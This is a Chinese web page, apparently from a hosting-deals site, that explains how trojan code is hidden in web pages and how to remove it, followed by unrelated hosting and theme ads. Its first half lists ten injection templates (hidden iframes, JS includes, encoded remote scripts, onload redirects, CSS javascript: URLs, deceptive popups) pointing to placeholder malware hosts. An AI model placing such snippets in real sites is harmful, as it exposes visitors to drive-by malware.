木马网站木马存在形式和清除方法

木马网站  时间:2021-02-20  阅读:()

网站木马存在形式和清除方法h123网址大全http://www.h123.net.cn

木马的存在形态有如下几种

一:框架挂马iframe src=地址width=0 height=0/iframe

二:js文件挂马

首先将以下代码document.write("iframe width='0' height='0' src='地址'/i frame

保存为xxx. js

则JS挂马代码为script language=javascript src=xxx. js/script

三:js变形加密

SCRIPT language="JScript.Encode"src=http://www.xxx.com/muma.txt/scriptmuma. txt可改成任意后缀

四:body挂马body onload="window. location='地址' ;"/body

五:隐蔽挂马top.document.body. innerHTML =top.document.body. innerHTML + ' \r\niframesrc="' ">http://www.xxxxxxxxxxxxxx"/iframe注意此网址

为虚拟仅为说明木马情况。

六:css中挂马body {

background-image:url (' javascript:document.write("scriptsrc=http://www.XXX.net/muma. j s/script") ' ) }

七:JAJA挂马

SCRIPT language=javascriptwindow.open ("地址

", "", "toolbar=no, location=no,directories=no, status=no,menubar=no, scro llbars=no,width=1,height=1") ;

/script

八:图片伪装htmliframe src="网马地址" height=0 width=0/iframeimg src="图片地址"/center

/html

九:伪装调用frameset rows="444,0" cols="*"frame src="打开网页" framborder="no" scrolling="auto"noresize marginwidth="0"margingheight="0"frame src="网马地址" frameborder="no" scrolling="no"noresize marginwidth="0"margingheight="0"

/frameset

十:高级欺骗a href="(迷惑连接地址显示这个地址指向木马地址)"onMouseOver="www_szweb_cn() ; return true;"页面要显示的内容/a

SCRIPT Language="JavaScript"function www_szweb_cn()

{var url="网马地址";open(url, "NewWindow", "toolbar=no, location=no,directories=no,

status=no,menubar=no, scrollbars=no,resizable=no, copyhistory=yes,width=800,height=600, left=10, top=10") ;}

/SCRIPT

清除木马的具体操作步骤如下

1)清除网页中的木马

删除现有的网页中的木马主要有这样类似的代码:iframe„或者„xxx. js/script

出现上面这些特征的代码如果里面包含的网址不是自己网站的那基本上就是中了木马了。我们比较常见的木马是iframe,对网站首页以及其它主要页面的源代码进行检查用记事本打开这些页面后 以“iframe”为关键字进行搜索找到后可以查看是否是挂马代码。不过碰上有经验的黑客会编写一段代码将整句挂马代码进行加密这样我们就很难找到网页中的挂马代码。这时可以将所有网页文件按修改时间进行排序如果有个别网页被修改我们可以很快地发现。

2)刺激google快速更新

木马被清除了 google上还是被屏蔽着。这时就想办法让google爬虫重新检索网站更新检索结果。这样 网站的屏蔽才能被解除。刺激google更新的的手段有如下一些

1)持续更新网站首页的文章

2)重新给google提交网站地图

3)为网站去找一些高质量的外链

4)申请审核。当网站有病毒后在google网站管理员工具内的“诊断”页面会有一个提示就是说网站含有恶意代码然后会提示你可以“申请审核”填写相关信息提交。h123网址大全http://www.h123.net.cn

wordpress高级跨屏企业主题 wordpress绿色企业自适应主题

wordpress高级跨屏企业主题,通用响应式跨平台站点开发,自适应PC端+各移动端屏幕设备,高级可视化自定义设置模块+高效的企业站搜索优化。wordpress绿色企业自适应主题采用标准的HTML5+CSS3语言开发,兼容当下的各种主流浏览器: IE 6+(以及类似360、遨游等基于IE内核的)、Firefox、Google Chrome、Safari、Opera等;同时支持移动终端的常用浏览器应...

HostSailor:罗马尼亚机房,内容宽松;罗马尼亚VPS七折优惠,罗马尼亚服务器95折

hostsailor怎么样?hostsailor成立多年,是一家罗马尼亚主机商家,机房就设在罗马尼亚,具说商家对内容管理的还是比较宽松的,商家提供虚拟主机、VPS及独立服务器,今天收到商家推送的八月优惠,针对所有的产品都有相应的优惠,商家的VPS产品分为KVM和OpenVZ两种架构,OVZ的比较便宜,有这方面需要的朋友可以看看。点击进入:hostsailor商家官方网站HostSailor优惠活动...

Friendhosting 黑色星期五 VDS/VPS可享四五折优惠促销

Friendhosting商家在前面的篇幅中也又陆续介绍到,是一家保加利亚主机商,主要提供销售VPS和独立服务器出租业务,数据中心分布在:荷兰、保加利亚、立陶宛、捷克、乌克兰和美国洛杉矶等。这不近期黑色星期五活动,商家也有推出了黑五优惠,VPS全场一次性45折,虚拟主机4折,全球多机房可选,老用户续费可获9折加送1个月使用时长,VDS折后最低仅€14.53/年,有需要的可以看看。Friendhos...

木马网站为你推荐
根目录什么叫固件?什么叫根目录?湖南商标注册在湖南商标注册到底有什么用,不就是一个图标吗?如何建立一个网站怎样能创建一个网站xv播放器下载除了迅雷看看播放器还有什么播放器支持xv格式的视频?创维云电视功能创维电视怎么用,我买了个创维云电视,现在不知道怎么用手机往电视上传照片,谁能解答以下,mate8价格现在买华为mate8高配划算吗安全漏洞什么是安全漏洞攻击??微信电话本怎么用微信电话本短信管理功能怎么用?声母是什么声母.韵母有哪些域名库域名赎回期过了多长时间可以注册
服务器租用托管 中文域名交易中心 java主机 gateone 免费网站监控 表格样式 数字域名 已备案删除域名 域名转接 秒杀汇 共享主机 免费活动 息壤代理 电信主机 paypal注册教程 流媒体加速 空间登录首页 云服务器比较 cdn服务 阿里云邮箱怎么注册 更多